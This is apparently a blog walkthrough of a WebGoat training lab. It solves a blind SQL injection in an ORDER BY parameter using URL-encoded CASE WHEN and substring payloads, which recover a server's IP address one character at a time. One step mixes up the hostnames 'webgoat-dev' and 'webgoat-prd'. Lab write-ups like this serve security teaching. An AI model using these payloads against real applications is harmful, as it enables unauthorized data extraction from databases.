Open in app

Sign in

Write

Sign in

WebGoat SQL injection mitigation lesson 12

PVXs
3 min readSep 14, 2020

--

In the lesson for this exercise (lesson 11) WebGoat tells us that in case of ORDER BY SQL statement it is possible to check and eventually exploit the injection by substituting the ORDER BY column with a SQL statement

Normal ORDER BY query
SELECT * FROM users ORDER BY lastnameMalicious ORDER BY query
SELECT * FROM users ORDER BY (CASE WHEN (<condition>) THEN lastname ELSE firstname)

So we still have a TRUE and FALSE conditions where we can check for guessed values

What is required in the lesson it to find the IP address for the webgoat-prd server, and for making things a little bit easier WebGoat is giving us the last three IP address octets

xxx.130.219.202

Start fiddling with the webapp

Sorting by IP address

Check out what Burp tells us about the request and response

Sorting request is a GET with a ‘column’ parameter

Send the request to Burp Repeater

Single quote injection

Let’s inject a single quote in the parameter

SQL Error with query in clear text

In the response we are given the whole SQL query with table and column names

SQL injection in ORDER BY using CASE construct

First thing I did is to check a TRUE SQL statement on something I knew, and I was given the server name ( webgoat-prd )

(CASE+WHEN+(SELECT+hostname+FROM+servers+WHERE+hostname='webgoat-dev')+=+'webgoat-dev'+THEN+id+ELSE+status+END)

The ORDER BY clause here is used as follows:

  • If there is a server hostname equal to ‘webgoat-prd’ the list would be ordered by ID
  • Else it would be ordered by status
ID ordered server list

As the response is ordered by ID, I can confirm there is a server named ‘webgoat-prd’

But just in case, let’s test something FALSE as well

Checking a FALSE statement

Here the list will be ordered by ID if the server hostname ‘webgoat-prd’ is equal to ‘webgoat-xyz’ so we are expecting a FALSE result and an ordering by STATUS

Server list ordered by STATUS

And we can see that ordering is not by ID, then it is possible to try and guess the IP address of the ‘webgoat-prd’ server by checking one number at a time as follows:

# substring(IP address,1,1) = '1'
(CASE+WHEN+(SELECT+substring(ip,1,1)+FROM+servers+WHERE+hostname='webgoat-prd')+=+'1'+THEN+id+ELSE+status+END)# substring(IP address,1,2) = '10'
(CASE+WHEN+(SELECT+substring(ip,1,2)+FROM+servers+WHERE+hostname='webgoat-prd')+=+'10'+THEN+id+ELSE+status+END)

After checking all possible numbers for every position, the solution is

# substring(IP address,1,4) = '104.'
(CASE+WHEN+(SELECT+substring(ip,1,4)+FROM+servers+WHERE+hostname='webgoat-prd')+=+'104.'+THEN+id+ELSE+status+END)

The rest of the IP address is already given, but if you want you can go ahead and check the whole IP string if you like

This concludes WebGoat SQL injection mitigation 12

I hope you liked it

PVXs — https://twitter.com/pivixih

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Infosec
Ctf Writeup
Sql Injection
Webgoat
Solutions

--

--

PVXs
PVXs

Written by PVXs

112 Followers
24 Following

IT Manager / Pentester

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams